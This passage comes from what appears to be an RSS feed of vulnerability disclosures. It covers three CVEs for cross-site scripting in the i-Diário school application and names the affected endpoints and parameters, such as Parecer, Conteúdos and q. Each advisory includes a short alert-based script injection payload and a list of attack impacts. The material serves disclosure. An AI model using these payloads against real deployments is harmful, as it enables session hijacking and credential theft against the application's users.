&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/planos-de-ensino-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9105-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-ensino-por-areas-de-conhecimentoid&amp;#34;&amp;gt;CVE-2025-9105: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/planos-de-ensino-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9105&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9105&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/planos-de-ensino-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/planos-de-ensino-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Habilidades&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9105/image.png&amp;#34;
	width=&amp;#34;964&amp;#34;
	height=&amp;#34;445&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9105/image_hu_6a8ccd33487555d5.png 480w, /p/cve-2025-9105/image_hu_3c579fd2be61c8bf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;216&amp;#34;
		data-flex-basis=&amp;#34;519px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9105/image-1.png&amp;#34;
	width=&amp;#34;682&amp;#34;
	height=&amp;#34;415&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9105/image-1_hu_79d858c0f7af1de1.png 480w, /p/cve-2025-9105/image-1_hu_a6bd84db6d6c2b22.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;164&amp;#34;
		data-flex-basis=&amp;#34;394px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9105.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9105.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 18 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9106</title>
        <link>https://www.cvehunters.com/p/cve-2025-9106/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9106/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9106-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-ensino-por-disciplinaid&amp;#34;&amp;gt;CVE-2025-9106: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/planos-de-ensino-por-disciplina/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9106&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9106&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/planos-de-ensino-por-disciplina/[ID]&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9106-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-ensino-por-disciplinaid&amp;#34;&amp;gt;CVE-2025-9106: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/planos-de-ensino-por-disciplina/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9106&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9106&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/planos-de-ensino-por-disciplina/[ID]&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/planos-de-ensino-por-disciplina/[ID]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9106/image.png&amp;#34;
	width=&amp;#34;960&amp;#34;
	height=&amp;#34;455&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9106/image_hu_bfb635a7cbffc853.png 480w, /p/cve-2025-9106/image_hu_8eac10bb6159118e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;210&amp;#34;
		data-flex-basis=&amp;#34;506px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9106/image-1.png&amp;#34;
	width=&amp;#34;653&amp;#34;
	height=&amp;#34;412&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9106/image-1_hu_aec1559962a33def.png 480w, /p/cve-2025-9106/image-1_hu_8b0ce06d2d54dc01.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;158&amp;#34;
		data-flex-basis=&amp;#34;380px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9106%20.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9106%20.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 18 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9107</title>
        <link>https://www.cvehunters.com/p/cve-2025-9107/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9107/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9107-cross-site-scripting-xss-reflected-in-endpoint-search_autocomplete-parameter-q&amp;#34;&amp;gt;CVE-2025-9107: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9107&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9107&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9107/image.png&amp;#34;
	width=&amp;#34;861&amp;#34;
	height=&amp;#34;1054&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9107/image_hu_8aadeff40c8f3d51.png 480w, /p/cve-2025-9107/image_hu_3012aeb2aec1845.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;81&amp;#34;
		data-flex-basis=&amp;#34;196px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
